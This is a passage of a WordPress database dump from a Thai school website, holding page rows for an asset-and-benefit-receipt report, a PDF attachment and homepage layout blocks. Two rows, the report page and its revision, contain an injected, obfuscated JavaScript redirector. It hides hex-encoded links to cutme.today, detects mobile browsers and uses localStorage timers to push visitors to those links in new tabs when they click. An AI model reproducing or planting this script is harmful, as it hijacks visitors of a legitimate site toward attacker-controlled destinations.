_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b4%e0%b8%99%e0%b8%ab','','','2024-08-15 11:59:18','2024-08-15 04:59:18','',0,'http://pakhaeng.ssk.in.th/?page_id=836',0,'page','',0),
(837,1,'2024-08-15 09:35:00','2024-08-15 02:35:00','','O29 รายงานการรับทรัพย์สิน หรือประโยชน์อื่นใด','','inherit','','closed','','o29-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b4%e0%b8%99','','','2024-08-15 09:35:00','2024-08-15 02:35:00','',836,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O29-รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf',0,'attachment','application/pdf',0),
(838,1,'2024-08-15 09:35:35','2024-08-15 02:35:35','<!-- wp:file {\"id\":837,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O29-รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O29-รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานการรับทรัพย์สิน หรือประโยชน์อื่นใด\"></object><a id=\"wp-block-file--media-398303c8-794b-400e-b01e-58284f8a0850\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O29-รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\">รายงานการรับทรัพย์สิน หรือประโยชน์อื่นใด</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O29-รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-398303c8-794b-400e-b01e-58284f8a0850\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา','','inherit','closed','closed','','836-revision-v1','','','2024-08-15 09:35:35','2024-08-15 02:35:35','',836,'http://pakhaeng.ssk.in.th/?p=838',0,'revision','',0),
(839,1,'2024-08-15 09:35:55','2024-08-15 02:35:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 